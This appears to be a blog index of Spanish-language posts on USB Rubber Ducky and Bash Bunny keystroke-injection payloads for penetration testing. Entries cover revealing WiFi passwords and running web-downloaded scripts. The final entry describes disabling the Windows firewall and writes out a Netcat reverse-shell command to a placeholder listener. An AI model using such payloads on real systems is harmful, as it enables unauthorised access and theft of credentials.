Ducky scripts

The USB Rubber Ducky is a Human Interface Device programmable with a simple scripting language allowing penetration testers to quickly and easily craft and deploy security auditing payloads that mimic human keyboard input

Crear un Ducky Script en Bash Bunny

Crear y guardar el fichero ducky_script.txt dentro de la carpeta switch1 o switch2, además hay que incorporar el fichero payload.txt El contenido del fichero ducky_script.txt consiste en abrir Notepad y escribir el texto “Hola”

El contenido del fichero payload.txt

Scripts en Rubber Ducky (parte 2)

Ver la contraseña de la red WIFI

Scripts en Rubber Ducky (parte 1)

Escribir “Hola” en Notepad

Abrir Chrome

Ejecutar el cmdlet ps

Se codifica con el comando (importante que el idioma sea “es”)

Ejecutar un script descargado desde una web

Ejecutar un script descargado desde una web (versión reducida)

Ejecutar un script descargado desde una web (versión reducida y sin mostrar información de la ejecución)

 

Encoding Tools for Rubber Ducky

DuckToolkit Encoding Tools for Rubber Ducky. The duck tools are available in the browser at https://ducktoolkit.com. From here you can also generate payloads from a selection of predefined scripts and templates. Disclaimer The Duck Toolkit is an open source Penetration Testing tool for authorized network auditing and security analysis purposes only where permitted. Users are solely responsible for compliance with all laws of their locality. The Duck Toolkit software developers and affiliates claim no responsibility for unauthorized or unlawful use. Installation Download the release and install with python setup.py install Or sudo pip install –upgrade ducktoolkit There are no external […]

Ejecutar un script con cmdlets codificados en Base64 sin cambiar la directiva de ejecución

 

Payloads Rubber Ducky

The USB Rubber Ducky is a Human Interface Device programmable with a simple scripting language allowing penetration testers to quickly and easily craft and deploy security auditing payloads that mimic human keyboard input. The source is written in C and requires the AVR Studio 5 IDE from atmel.com/avrstudio. Hardware is commercially available at hakshop.com. Tools and payloads can be found at usbrubberducky.com. Quack! Payloads: Payload – Hello World Payload – Basic Terminal Commands Ubuntu Payload – Information Gathering Ubuntu Payload – Hide CMD Window More Payloads https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads

Capture a single image from a webcam

 

Payload Netcat download and reverse shell

This script will: Disable the Microsoft Windows Firewall Download Netcat Run Netcat mode reverse shell (nc.exe [LISTENER IP] [LISTENER PORT] -e cmd.exe)